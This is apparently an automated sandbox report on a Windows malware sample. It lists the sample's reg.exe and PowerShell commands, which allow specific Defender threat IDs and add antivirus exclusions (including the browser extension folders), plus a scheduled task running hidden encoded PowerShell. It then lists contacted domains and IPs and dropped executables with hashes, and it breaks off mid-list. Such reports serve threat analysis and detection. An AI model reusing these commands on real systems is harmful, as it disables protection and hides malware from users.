"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RKrrVaXXRkyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RKrrVaXXRkyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SyLYnxBDrvwnC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SyLYnxBDrvwnC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jnZuMDLgU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jnZuMDLgU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prPmKzeVCFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\prPmKzeVCFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YNmVtKIhxUNsrgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YNmVtKIhxUNsrgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LVCnHeNtpGpwKZds\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\LVCnHeNtpGpwKZds\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RKrrVaXXRkyU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SyLYnxBDrvwnC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SyLYnxBDrvwnC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hBSCUihLQgbWRjbaUSR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jnZuMDLgU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jnZuMDLgU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prPmKzeVCFUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\prPmKzeVCFUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YNmVtKIhxUNsrgVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YNmVtKIhxUNsrgVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LVCnHeNtpGpwKZds /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LVCnHeNtpGpwKZds /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gNeYrIDgN" /SC once /ST 05:31:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gNeYrIDgN"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 186.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 206.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 45.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 59.8.26.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 cczhk.com udp
US 8.8.8.8:53 294down-river.sbs udp
US 104.21.67.206:80 294down-river.sbs tcp
PA 200.46.202.73:80 cczhk.com tcp
DE 185.172.128.127:80 185.172.128.127 tcp
US 8.8.8.8:53 def.bestsup.su udp
US 8.8.8.8:53 vk.com udp
US 8.8.8.8:53 acenitive.shop udp
US 8.8.8.8:53 monoblocked.com udp
RU 147.45.47.101:80 147.45.47.101 tcp
US 8.8.8.8:53 cleued.com udp
US 8.8.8.8:53 medfioytrkdkcodlskeej.net udp
US 104.21.67.206:443 294down-river.sbs tcp
US 172.67.171.112:80 def.bestsup.su tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 104.21.4.60:80 cleued.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 188.114.96.2:80 acenitive.shop tcp
US 188.114.96.2:80 acenitive.shop tcp
RU 45.130.41.108:80 monoblocked.com tcp
US 8.8.8.8:53 206.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 73.202.46.200.in-addr.arpa udp
US 8.8.8.8:53 127.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 112.171.67.172.in-addr.arpa udp
US 8.8.8.8:53 60.4.21.104.in-addr.arpa udp
US 8.8.8.8:53 101.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 164.137.240.87.in-addr.arpa udp
US 8.8.8.8:53 209.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 108.41.130.45.in-addr.arpa udp
PA 200.46.202.73:80 cczhk.com tcp
US 8.8.8.8:53 triedchicken.net udp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 188.114.96.2:80 acenitive.shop tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 188.114.96.2:80 acenitive.shop tcp
US 104.21.4.60:80 cleued.com tcp
US 172.67.180.119:80 triedchicken.net tcp
US 172.67.180.119:80 triedchicken.net tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 172.67.180.119:80 triedchicken.net tcp
RU 45.130.41.108:80 monoblocked.com tcp
RU 91.215.85.209:80 medfioytrkdkcodlskeej.net tcp
US 172.67.180.119:443 triedchicken.net tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 91.215.85.209:443 medfioytrkdkcodlskeej.net tcp
RU 45.130.41.108:443 monoblocked.com tcp
US 188.114.96.2:80 acenitive.shop tcp
US 188.114.96.2:80 acenitive.shop tcp
US 104.21.4.60:80 cleued.com tcp
US 188.114.96.2:443 acenitive.shop tcp
US 188.114.96.2:443 acenitive.shop tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 104.21.4.60:443 cleued.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 pergor.com udp
US 172.67.156.81:443 pergor.com tcp
GB 2.19.169.32:80 x2.c.lencr.org tcp
US 8.8.8.8:53 119.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
US 8.8.8.8:53 81.156.67.172.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
US 8.8.8.8:53 carthewasher.net udp
US 104.21.82.182:443 carthewasher.net tcp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 182.82.21.104.in-addr.arpa udp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
US 8.8.8.8:53 632432.site udp
US 8.8.8.8:53 sun6-21.userapi.com udp
RU 87.240.137.164:443 vk.com tcp
US 8.8.8.8:53 sun6-22.userapi.com udp
NL 95.142.206.1:443 sun6-21.userapi.com tcp
NL 95.142.206.2:443 sun6-22.userapi.com tcp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
NL 194.104.136.64:443 632432.site tcp
RU 87.240.137.164:443 vk.com tcp
US 8.8.8.8:53 psv4.userapi.com udp
RU 87.240.190.89:443 psv4.userapi.com tcp
NL 95.142.206.1:443 sun6-21.userapi.com tcp
RU 87.240.137.164:443 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
US 8.8.8.8:53 sun6-20.userapi.com udp
NL 95.142.206.0:443 sun6-20.userapi.com tcp
RU 87.240.137.164:80 vk.com tcp
RU 87.240.137.164:443 vk.com tcp
NL 95.142.206.0:443 sun6-20.userapi.com tcp
US 8.8.8.8:53 1.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 2.206.142.95.in-addr.arpa udp
US 8.8.8.8:53 64.136.104.194.in-addr.arpa udp
US 8.8.8.8:53 89.190.240.87.in-addr.arpa udp
US 8.8.8.8:53 0.206.142.95.in-addr.arpa udp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 iplis.ru udp
US 172.67.147.32:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 32.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 208.4.21.104.in-addr.arpa udp
DE 185.172.128.24:80 185.172.128.24 tcp
US 8.8.8.8:53 api.2ip.ua udp
US 8.8.8.8:53 24.128.172.185.in-addr.arpa udp
US 172.67.139.220:443 api.2ip.ua tcp
US 8.8.8.8:53 220.139.67.172.in-addr.arpa udp
RU 193.233.132.67:50505 tcp
US 8.8.8.8:53 67.132.233.193.in-addr.arpa udp
DE 77.105.147.130:80 77.105.147.130 tcp
US 8.8.8.8:53 villagemagneticcsa.fun udp
US 8.8.8.8:53 healthproline.pro udp
US 8.8.8.8:53 api.myip.com udp
US 188.114.97.2:443 healthproline.pro tcp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 chocolatedepressofw.fun udp
US 8.8.8.8:53 130.147.105.77.in-addr.arpa udp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 prescriptionstorageag.fun udp
US 8.8.8.8:53 2.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 59.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 theoryapparatusjuko.fun udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 snuggleapplicationswo.fun udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 8.8.8.8:53 smallrabbitcrossing.site udp
US 188.114.96.2:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 punchtelephoneverdi.store udp
US 8.8.8.8:53 telephoneverdictyow.site udp
RU 193.233.132.49:53 strainriskpropos.store udp
RU 193.233.132.49:53 associationokeo.shop udp
US 104.21.10.242:443 associationokeo.shop tcp
RU 193.233.132.49:53 49.132.233.193.in-addr.arpa udp
RU 193.233.132.49:53 242.10.21.104.in-addr.arpa udp
DE 77.105.147.130:80 77.105.147.130 tcp
NL 195.20.16.46:80 195.20.16.46 tcp
RU 193.233.132.49:53 t.me udp
NL 195.20.16.46:80 195.20.16.46 tcp
US 8.8.8.8:53 t.me udp
RU 193.233.132.49:53 46.16.20.195.in-addr.arpa udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
DE 142.132.224.223:9001 142.132.224.223 tcp
US 8.8.8.8:53 223.224.132.142.in-addr.arpa udp
DE 142.132.224.223:9001 142.132.224.223 tcp
DE 142.132.224.223:9001 142.132.224.223 tcp
US 8.8.8.8:53 iplis.ru udp
US 104.21.63.150:443 iplis.ru tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
DE 142.132.224.223:9001 142.132.224.223 tcp
US 8.8.8.8:53 150.63.21.104.in-addr.arpa udp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
RU 5.42.65.31:48396 tcp
US 8.8.8.8:53 234.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 31.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 sjyey.com udp
MX 201.119.110.201:80 sjyey.com tcp
MX 201.119.110.201:80 sjyey.com tcp
US 8.8.8.8:53 201.110.119.201.in-addr.arpa udp
MX 201.119.110.201:80 sjyey.com tcp
MX 201.119.110.201:80 sjyey.com tcp
MX 201.119.110.201:80 sjyey.com tcp
MX 201.119.110.201:80 sjyey.com tcp
US 8.8.8.8:53 1ea84d9c-98da-4805-a5de-9748a9882c91.uuid.statsexplorer.org udp
RU 193.233.132.49:53 sjyey.com udp
US 8.8.8.8:53 sjyey.com udp
KR 211.168.53.110:80 sjyey.com tcp
US 8.8.8.8:53 110.53.168.211.in-addr.arpa udp
KR 211.168.53.110:80 sjyey.com tcp
KR 211.168.53.110:80 sjyey.com tcp
KR 211.168.53.110:80 sjyey.com tcp
US 8.8.8.8:53 server14.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun1.l.google.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
NL 74.125.128.127:19302 stun1.l.google.com udp
BG 185.82.216.108:443 server14.statsexplorer.org tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 127.128.125.74.in-addr.arpa udp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 71.221.67.172.in-addr.arpa udp

Files

memory/1136-0-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-1-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-2-0x00007FFFB65A0000-0x00007FFFB6869000-memory.dmp

memory/1136-3-0x00007FFFB7480000-0x00007FFFB753E000-memory.dmp

memory/1136-4-0x00007FFFB65A0000-0x00007FFFB6869000-memory.dmp

memory/1136-5-0x00007FFF80000000-0x00007FFF80002000-memory.dmp

memory/1136-6-0x00007FFF80030000-0x00007FFF80031000-memory.dmp

memory/1136-7-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-8-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-9-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-10-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-11-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-12-0x0000000140000000-0x0000000140B9C000-memory.dmp

memory/1136-13-0x00007FFFB8A30000-0x00007FFFB8C25000-memory.dmp

C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe

MD5 852f8672ad668dbef934f55b4d098973
SHA1 75713a5a598e5eccb863f6670ff4e5738058a64e
SHA256 5bd8c1d6809b1605876dc47c8a04312ebbbb7fc5d443ea81b1e3665c2fc34428
SHA512 5dadb891221cf37f451e563e775f793146c549390f1cd8524462f000b4ccc7337451997f00f089082674744ba9cd9a387615394f7428f48b69c429587ede0426

C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe

MD5 08ae943738a43f39ca279a003fa3e4a2
SHA1 b84294ead8a676e75064419062a84ffac825b8d5
SHA256 da9835d067dae3fafa046036707ecbabf4b6920091568266f1af3f1072469d74
SHA512 575a23ee68bbc21915f280d65515fcfccdeaf57f9d74af8e747b33bc50f66bf4ecdb15c13164275bd20e4fd6ec6bd16e614b7965f379b924ff5f7fca3147b742

memory/1136-44-0x0000000140000000-0x0000000140B9C000-memory.dmp

C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe

MD5 43abfd80cbfe8afaa65961856640efc4
SHA1 71614b90bb167b289d6d01d3768727eb6ac61ec5
SHA256 f125414e6c33771e07ed5b186e765c5c7cbab090deee72d70af657f1b4abf691
SHA512 bf84a17d811fcd20602a49121731399517e327cf5b1af015d1967af7d741c1b1b03219da0d62b1d9f8abdd800ef7edca83acb7ca909deffdc5023853ea8b540e

C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe

MD5 e654823683cb9be41044f5a800be69fd
SHA1 d43214c03a47f3b0c77a82eca775d702eaa025e8
SHA256 68abca4995919db0fe3a4e9158062759b2267ebcd8e3036f7eb8e71ed6202c85
SHA512 d20b18482b8f85bfa887495275712527939b388f912eac2388b2c446d4370a87118c01482898316b943667b2525b9b089d44e8e693cc6c5a6d9355ab2d9e6bcc

C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe

MD5 631393c67cb220cf18796dec2314c118
SHA1 751638c8a1b070b354231a2fd4283f02f303ca94
SHA256 e98c24e3639daa42b133774bce94eb385d68b2a81be6fe460c997c5be900a600
SHA512 b41105af3663da05fd2382735aede37da71a5d85ba1051a7fba03f6beeb556d842015e9977171de3285d7bbe47a41200db8de9748c3b4629d342d013593c07d6

C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe

MD5 a6b7675ef59c1f70955db3b35a908ba5
SHA1 4651853419533386ca296714a0ef4f0b69993ed7
SHA256 3b3dd4ca3ccb3efb70ff120ec887f84927eef73f324028730d7942bf279dab69
SHA512 7bd39cc3ef5f555a96e3d7cdb7ead3c419a5a219fbe3bf30a5f2017e2ea8ba1815ecc7ff0b51cde7d21b8d0e2c24bbf84742351ee4cb2b30df0f22e529879c04

C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe

MD5 61b46e3330294cfb1f16aebffead19a7
SHA1 8171ae0853f7d0c9eac8821e3b345c8617d52864
SHA256 4268a8b962ae3d55dcd7359124ed3166f3853f54ef3695194cdc78dc693a1c78
SHA512 30128125b931896529ecd858bf1c11411f20d3f5e1821920c50151de3f3597b7b5ded72b563bbc5692fc31f97861dad036b0f7e650b64bc7e7eee405dc31dfb5

C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe

MD5 284a6460a21e15f1018bc2b29ca92cb9
SHA1 e2126fc74e04e72e83b99568565f82f6214d8fff
SHA256 ccb4070a95d7bcd45e8ef95712e5bd022c5fafdccefc992d2768d8b23fce6ce4
SHA512 65481ab3722d99c2c2e88e1bcaf27e8983ed290c5c11cfe5e313c613da3dd1202f7ccf2dde6194a28f27a39474bc42283502348b6cb26577676a9db97123ca68

C:\Users\Admin\Documents\GuardFox\ihJSiKtOCgQYcjTT87vV5pxv.exe

MD5 0c0e3516291c7a8388225e215935a511
